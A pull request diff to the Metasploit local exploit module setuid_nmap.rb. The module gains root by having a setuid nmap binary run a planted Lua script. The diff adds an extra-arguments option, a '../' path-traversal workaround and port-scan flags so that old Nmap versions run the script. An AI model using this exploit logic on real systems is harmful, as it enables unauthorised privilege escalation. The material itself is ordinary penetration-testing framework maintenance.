### PR TITLE
Add compatibility arguments to Nmap command for setuid_nmap

### DIFF
--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -53,6 +53,7 @@ class Metasploit4 < Msf::Exploit::Local
 				# These are not OptPath becuase it's a *remote* path
 				OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
 				OptString.new("Nmap",        [ true, "Path to setuid nmap executable", "/usr/bin/nmap" ]),
+				OptString.new("ExtraArgs",        [ false, "Extra arguments to pass to Nmap (e.g. --datadir)", "" ]),
 			], self.class)
 	end
 
@@ -86,8 +87,16 @@ class Metasploit4 < Msf::Exploit::Local
 
 		print_status("running")
 
+		scriptname = lua_file
+		if (lua_file[0] == "/")
+			# Versions before 4.51BETA (December 2007) only accept relative paths for script names
+			# Figure 10 up-directory traversals is enough.
+			scriptname = ("../" * 10) + lua_file[1..-1]
+		end
+
 		begin
-			cmd_exec "#{datastore["Nmap"]} --script #{lua_file} -p80 localhost"
+			# Versions before 4.75 (August 2008) will not run scripts without a port scan
+			cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
 		ensure
 			cmd_exec "rm -f #{lua_file} #{exe_file}"
 		end

--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -87,7 +87,7 @@ class Metasploit4 < Msf::Exploit::Local
 		print_status("running")
 
 		begin
-			cmd_exec "#{datastore["Nmap"]} --script #{lua_file}"
+			cmd_exec "#{datastore["Nmap"]} --script #{lua_file} -p80 localhost"
 		ensure
 			cmd_exec "rm -f #{lua_file} #{exe_file}"
 		end


### PR DESCRIPTION
Nmap before 4.75 would not run a script without a port scan being
performed. Example: 4.53 installed on Metasploitable would not work.
Added "-p80 localhost" to the command to ensure it works with these
older versions.
